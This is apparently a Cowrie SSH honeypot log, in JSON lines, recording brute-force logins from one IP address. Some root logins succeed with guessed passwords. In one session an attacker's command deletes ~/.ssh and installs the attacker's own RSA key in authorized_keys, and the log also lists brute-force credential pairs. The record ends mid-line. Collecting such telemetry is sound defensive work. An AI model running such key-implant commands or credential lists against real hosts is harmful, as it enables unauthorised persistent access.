{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:47:02.875499Z","src_ip":"212.227.235.229","session":"f680276215e4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:47:03.931043Z","src_ip":"212.227.235.229","session":"f680276215e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58240,"dst_ip":"1.2.3.4","dst_port":22,"session":"032850b20f37","protocol":"ssh","message":"New connection: 212.227.235.229:58240 (1.2.3.4:22) [session: 032850b20f37]","sensor":"my-vps","timestamp":"2025-09-08T22:47:05.432740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:47:05.433666Z","src_ip":"212.227.235.229","session":"032850b20f37"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:05.507866Z","src_ip":"212.227.235.229","session":"f680276215e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:47:05.685751Z","src_ip":"212.227.235.229","session":"032850b20f37"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:47:06.732992Z","src_ip":"212.227.235.229","session":"032850b20f37"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:06.986639Z","src_ip":"212.227.235.229","session":"032850b20f37"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:06.989882Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37488,"dst_ip":"1.2.3.4","dst_port":22,"session":"93f15542ce29","protocol":"ssh","message":"New connection: 212.227.235.229:37488 (1.2.3.4:22) [session: 93f15542ce29]","sensor":"my-vps","timestamp":"2025-09-08T22:47:12.540003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:47:12.541052Z","src_ip":"212.227.235.229","session":"93f15542ce29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:47:12.772318Z","src_ip":"212.227.235.229","session":"93f15542ce29"}
{"eventid":"cowrie.login.failed","username":"p","password":"p","message":"login attempt [p/p] failed","sensor":"my-vps","timestamp":"2025-09-08T22:47:13.739548Z","src_ip":"212.227.235.229","session":"93f15542ce29"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:14.973522Z","src_ip":"212.227.235.229","session":"93f15542ce29"}
{"eventid":"cowrie.session.connect","src_ip":"103.226.249.77","src_port":32873,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1145517b3cb","protocol":"ssh","message":"New connection: 103.226.249.77:32873 (1.2.3.4:22) [session: b1145517b3cb]","sensor":"my-vps","timestamp":"2025-09-08T22:47:17.436678Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:17.670412Z","src_ip":"103.226.249.77","session":"b1145517b3cb"}
{"eventid":"cowrie.session.closed","duration":31.248037815093994,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:18.780206Z","src_ip":"212.227.235.229","session":"da89d4c5769c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50758,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c0e24f8e47a","protocol":"ssh","message":"New connection: 212.227.235.229:50758 (1.2.3.4:22) [session: 2c0e24f8e47a]","sensor":"my-vps","timestamp":"2025-09-08T22:47:28.206440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:47:28.207345Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:47:28.539691Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.login.success","username":"root","password":"Ff123456@","message":"login attempt [root/Ff123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:47:29.911638Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:47:30.636204Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:47:30.637072Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:47:30.637952Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:30.971770Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:47:31.655059Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:47:31.655909Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:47:31.990541Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:31.991435Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52448,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0763e63a1e8","protocol":"ssh","message":"New connection: 212.227.235.229:52448 (1.2.3.4:22) [session: b0763e63a1e8]","sensor":"my-vps","timestamp":"2025-09-08T22:47:32.340891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:47:32.341802Z","src_ip":"212.227.235.229","session":"b0763e63a1e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:47:32.678113Z","src_ip":"212.227.235.229","session":"b0763e63a1e8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:47:34.064378Z","src_ip":"212.227.235.229","session":"b0763e63a1e8"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:35.403775Z","src_ip":"212.227.235.229","session":"b0763e63a1e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53958,"dst_ip":"1.2.3.4","dst_port":22,"session":"efcdcc14475e","protocol":"ssh","message":"New connection: 212.227.235.229:53958 (1.2.3.4:22) [session: efcdcc14475e]","sensor":"my-vps","timestamp":"2025-09-08T22:47:35.723899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:47:35.724681Z","src_ip":"212.227.235.229","session":"efcdcc14475e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:47:36.052537Z","src_ip":"212.227.235.229","session":"efcdcc14475e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:47:37.365928Z","src_ip":"212.227.235.229","session":"efcdcc14475e"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:37.689451Z","src_ip":"212.227.235.229","session":"2c0e24f8e47a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:37.695590Z","src_ip":"212.227.235.229","session":"efcdcc14475e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35156,"dst_ip":"1.2.3.4","dst_port":22,"session":"45bcad348e66","protocol":"ssh","message":"New connection: 212.227.235.229:35156 (1.2.3.4:22) [session: 45bcad348e66]","sensor":"my-vps","timestamp":"2025-09-08T22:47:42.332619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:47:42.333737Z","src_ip":"212.227.235.229","session":"45bcad348e66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:47:42.433050Z","src_ip":"212.227.235.229","session":"45bcad348e66"}
{"eventid":"cowrie.login.failed","username":"dbsql","password":"123","message":"login attempt [dbsql/123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:47:42.871073Z","src_ip":"212.227.235.229","session":"45bcad348e66"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:43.972477Z","src_ip":"212.227.235.229","session":"45bcad348e66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42560,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff18890de0c2","protocol":"ssh","message":"New connection: 212.227.235.229:42560 (1.2.3.4:22) [session: ff18890de0c2]","sensor":"my-vps","timestamp":"2025-09-08T22:47:47.511152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:47:47.537664Z","src_ip":"212.227.235.229","session":"ff18890de0c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:47:47.768962Z","src_ip":"212.227.235.229","session":"ff18890de0c2"}
{"eventid":"cowrie.login.failed","username":"tunnel","password":"changeme","message":"login attempt [tunnel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:47:48.785035Z","src_ip":"212.227.235.229","session":"ff18890de0c2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:50.031221Z","src_ip":"212.227.235.229","session":"ff18890de0c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39936,"dst_ip":"1.2.3.4","dst_port":22,"session":"04ffc86889e0","protocol":"ssh","message":"New connection: 212.227.235.229:39936 (1.2.3.4:22) [session: 04ffc86889e0]","sensor":"my-vps","timestamp":"2025-09-08T22:48:06.572177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:48:06.573231Z","src_ip":"212.227.235.229","session":"04ffc86889e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 